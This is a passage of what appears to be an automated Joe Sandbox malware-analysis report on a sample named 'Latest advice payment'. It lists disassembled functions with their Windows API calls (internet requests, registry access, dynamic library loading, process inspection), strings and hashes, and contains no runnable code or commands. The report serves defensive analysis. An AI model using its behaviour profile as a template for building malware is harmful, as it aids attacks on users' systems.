                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: 3065321b97c7978b8d25183e2dce7f1f75749bc94977c221a4f8379067da1fad
                                                            • Instruction ID: 218ba06982d91077b4cdda6f3e22bef36b13c2bf3867e891abdcd1b20ba9495d
                                                            • Opcode Fuzzy Hash: 3065321b97c7978b8d25183e2dce7f1f75749bc94977c221a4f8379067da1fad
                                                            • Instruction Fuzzy Hash: 06418E702043429FDB24DF64D884F5ABFE4FF85314F044A2DF9A597291DB70A805CB62
                                                            Function 005DD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 005DD7C5
                                                              • Part of subcall function 0056784B: _memmove.LIBCMT ref: 00567899
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: 866d97b95283eb78781e537d9fbb1b19d0ab6b270eb332e254a5240221ca0839
                                                            • Instruction ID: 975443aa56ae0382c1fb5e64d6d2b05fcc24d7ba3d585fb06bb3f759dda7e85c
                                                            • Opcode Fuzzy Hash: 866d97b95283eb78781e537d9fbb1b19d0ab6b270eb332e254a5240221ca0839
                                                            • Instruction Fuzzy Hash: F231D47190421AABCF10EF58CC559EEBBB5FF54320B00862AE865A73D1DB31AD05CB90
                                                            Function 005B8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005B8F14
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005B8F27
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 005B8F57
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: 8b63a7b837b3d73c18771e72d41614fd62d890c9893f7e6fd824b3860f6fb270
                                                            • Instruction ID: 9d2c1cb9e6d9561124709f4387766a931810709f0985747a3b78a188aa3b6135
                                                            • Opcode Fuzzy Hash: 8b63a7b837b3d73c18771e72d41614fd62d890c9893f7e6fd824b3860f6fb270
                                                            • Instruction Fuzzy Hash: 5B21F271A00109BADB14ABA0DC89CFFBF7DEF95320B044529F861A71E1DE355949D620
                                                            Function 005D182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 005D184C
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005D1872
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005D18A2
                                                            • InternetCloseHandle.WININET(00000000), ref: 005D18E9
                                                              • Part of subcall function 005D2483: GetLastError.KERNEL32(?,?,005D1817,00000000,00000000,00000001), ref: 005D2498
                                                              • Part of subcall function 005D2483: SetEvent.KERNEL32(?,?,005D1817,00000000,00000000,00000001), ref: 005D24AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: aadcbf25b47da2d0b44a5cda18cddd8e3f2aa247c4b2b01bef80ca511fca450c
                                                            • Instruction ID: a730181bb905de0b513045c961c9930124fc78c595ea62708cc0903ffe3dbc8d
                                                            • Opcode Fuzzy Hash: aadcbf25b47da2d0b44a5cda18cddd8e3f2aa247c4b2b01bef80ca511fca450c
                                                            • Instruction Fuzzy Hash: 4321B0B1500608BFEB21DB68DC85EBB7BEDFB88744F10412BF805A6340EA319D0467A5
                                                            Function 005E63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00561D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00561D73
                                                              • Part of subcall function 00561D35: GetStockObject.GDI32(00000011), ref: 00561D87
                                                              • Part of subcall function 00561D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00561D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 005E6461
                                                            • LoadLibraryW.KERNEL32(?), ref: 005E6468
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 005E647D
                                                            • DestroyWindow.USER32(?), ref: 005E6485
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: ea6f5fab7ec2b6127588f652861753b9ebe603723ac83140d6adf686a7fb6d94
                                                            • Instruction ID: 846659f857c32e8e1a5608376f2132396a6a12013e27c297005217889cbfec42
                                                            • Opcode Fuzzy Hash: ea6f5fab7ec2b6127588f652861753b9ebe603723ac83140d6adf686a7fb6d94
                                                            • Instruction Fuzzy Hash: B8218E71100286ABEF144F65DC84EBB3BA9FB693E4F104629F990970D0D7319C41A760
                                                            Function 005C6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 005C6DBC
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005C6DEF
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 005C6E01
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 005C6E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 204699f00e172ead08d33622ad7caec6d68b1f7f6f62809db31a877246ee24b9
                                                            • Instruction ID: 6eb6dea157c3129f00058bd347ce138f1712e8e0605466cc9b9a0bd06b3690fa
                                                            • Opcode Fuzzy Hash: 204699f00e172ead08d33622ad7caec6d68b1f7f6f62809db31a877246ee24b9
                                                            • Instruction Fuzzy Hash: 3221917560020AAFDB209FA9DC44F9A7BA8FF94720F204A1DF9A1D72D0DB709A549B50
                                                            Function 005C6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 005C6E89
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005C6EBB
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 005C6ECC
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 005C6F06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: a3212256001b7360fa28572da965054f162dd55ee3bf79a9bdd14061c908f6f0
                                                            • Instruction ID: f81c3fa13c7b9f1d1ccf88533a1856b52ccca2a9346cac170da7ca0844f2eefb
                                                            • Opcode Fuzzy Hash: a3212256001b7360fa28572da965054f162dd55ee3bf79a9bdd14061c908f6f0
                                                            • Instruction Fuzzy Hash: 13218E795003069FDB209FA9DC44FAB7BA8BF55720F200A1EF9A0D72D0DB70AA51CB50
                                                            Function 005CAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 005CAC54
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 005CACA8
                                                            • __swprintf.LIBCMT ref: 005CACC1
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,005EF910), ref: 005CACFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: 4a865db5db664eb7c16df59b5e17c144751b2a1d1dc9b7b1038a567fc7a3902c
                                                            • Instruction ID: 05c0bd38b61122ab20848970f6394cc2e45bc9fbeaefbace15e2dc86c38ee51d
                                                            • Opcode Fuzzy Hash: 4a865db5db664eb7c16df59b5e17c144751b2a1d1dc9b7b1038a567fc7a3902c
                                                            • Instruction Fuzzy Hash: 11216234A0014EAFCB14DF95C985DEE7BB8FF89714B004469F9099B251DA31EA45DB21
                                                            Function 005C1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C115F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C1184
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C118E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,005BFCED,?,005C0D40,?,00008000), ref: 005C11C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID: @\
                                                            • API String ID: 2875609808-1487419200
                                                            • Opcode ID: d84dd5abf0f05ca8711f84ccba3bb86b00e6baa94fb145167535890852e509cb
                                                            • Instruction ID: 06a11728600b9ebde2556ceca01a54709551f83a7eb1fe3092a0ed363dca5ae4
                                                            • Opcode Fuzzy Hash: d84dd5abf0f05ca8711f84ccba3bb86b00e6baa94fb145167535890852e509cb
                                                            • Instruction Fuzzy Hash: 12113631C0091DDBCF049FE4D898BEEBF78BB1A711F044459EA80B6281CB349554DBA9
                                                            Function 005C1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 005C1B19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: ce3770242c029bce1bf8c7630fbab05ea3a0787a97f6ce7ba52467a66e6ecc16
                                                            • Instruction ID: 15821263deede8c920e799aad708f49c90a9ba8effa72533e5ac292f596d3353
                                                            • Opcode Fuzzy Hash: ce3770242c029bce1bf8c7630fbab05ea3a0787a97f6ce7ba52467a66e6ecc16
                                                            • Instruction Fuzzy Hash: C61161359002098FCF48EFA4D8569FEBBB5FF66308B144469D89467292EB325D0ACF54
                                                            Function 005DEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005DEC07
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 005DEC37
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 005DED6A
                                                            • CloseHandle.KERNEL32(?), ref: 005DEDEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: 6a1ee2cc0466dd05b2994ef78787dccc926b76353c99083a0cedeac125f6ad97
                                                            • Instruction ID: 0e8544be8dd960f822848be303bde2a4920c4c0bb272695b274bd3970dc30827
                                                            • Opcode Fuzzy Hash: 6a1ee2cc0466dd05b2994ef78787dccc926b76353c99083a0cedeac125f6ad97
                                                            • Instruction Fuzzy Hash: F78154716047019FD760EF28C88AF2ABBE5BF94710F14891EF9959B3D2DA71AC40CB91
                                                            Function 0058541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction ID: cba6f4c99b181c3e5496132084cab7fc1bcaa6e5f968818f7570099dea8fadb3
                                                            • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction Fuzzy Hash: C251B570A01B05DBDF25AFA9D88466E7FA6BF40321F248729FC25B62D0F7709D908B41
                                                            Function 005E0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005DFDAD,?,?), ref: 005E0E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E00FD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005E013C
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 005E0183
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 005E01AF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 005E01BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: 434f679458818909dfb44b5824d9238d453c1b79c3be1908d4cab15a1016ebef
                                                            • Instruction ID: 138ba35534f0786052352ce1a2d18e9a2c05a31b53a6437a2fbe63f4a0ba66c1
                                                            • Opcode Fuzzy Hash: 434f679458818909dfb44b5824d9238d453c1b79c3be1908d4cab15a1016ebef
                                                            • Instruction Fuzzy Hash: 13517B71208345AFC718EF58CC85E6ABBE9FF84314F40492DF5968B2A2DB71E944CB52
                                                            Function 005DD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 005DD927
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 005DD9AA
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 005DD9C6
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 005DDA07
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 005DDA21
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,005C7896,?,?,00000000), ref: 00565A2C
                                                              • Part of subcall function 00565A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,005C7896,?,?,00000000,?,?), ref: 00565A50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: 58e4d7917f22ce03e198b17d3b2bdeb582b4bed08232a2cbb83e44ff01a55db1
                                                            • Instruction ID: 05136fc36c13b6a8172dfba52ab31143e9e0486249a042ad89701af86535dd08
                                                            • Opcode Fuzzy Hash: 58e4d7917f22ce03e198b17d3b2bdeb582b4bed08232a2cbb83e44ff01a55db1
                                                            • Instruction Fuzzy Hash: 53512935A0420ADFCB14EFA8C4989ADBBF4FF59310B04C06AE855AB322DB31AD45CF51
                                                            Function 005CE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005CE61F
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 005CE648
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 005CE687
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 005CE6AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 005CE6B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: a7534fbde9917183cd195eef06eec623b005868adcea274ee09883d383c74a95
                                                            • Instruction ID: c4a40085b86cbde251dd75e4893fb6fa2b5616529acff063f45c4d4bd56a391a
                                                            • Opcode Fuzzy Hash: a7534fbde9917183cd195eef06eec623b005868adcea274ee09883d383c74a95
                                                            • Instruction Fuzzy Hash: C6512A35A00106DFCB05EFA4C985AAEBBF9FF49314B1480A9E849AB361CB31ED55DF50
                                                            Function 005EA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
